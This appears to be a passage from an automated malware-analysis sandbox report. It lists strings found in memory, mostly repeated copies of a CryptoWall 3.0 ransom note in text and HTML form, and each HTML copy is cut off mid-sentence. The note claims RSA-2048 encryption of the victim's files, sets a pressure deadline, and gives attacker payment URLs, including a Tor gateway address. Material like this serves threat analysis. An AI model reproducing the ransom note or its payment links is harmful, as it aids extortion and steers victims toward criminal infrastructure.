href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt349.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html366.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt333.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt31.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt90.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt189.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt180.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt89.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt274.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt317.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html132.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt190.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt195.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html345.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html254.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt115.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html78.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt337.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html281.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html260.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt178.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html134.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html87.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt53.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt234.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt108.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html65.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html13.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt197.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
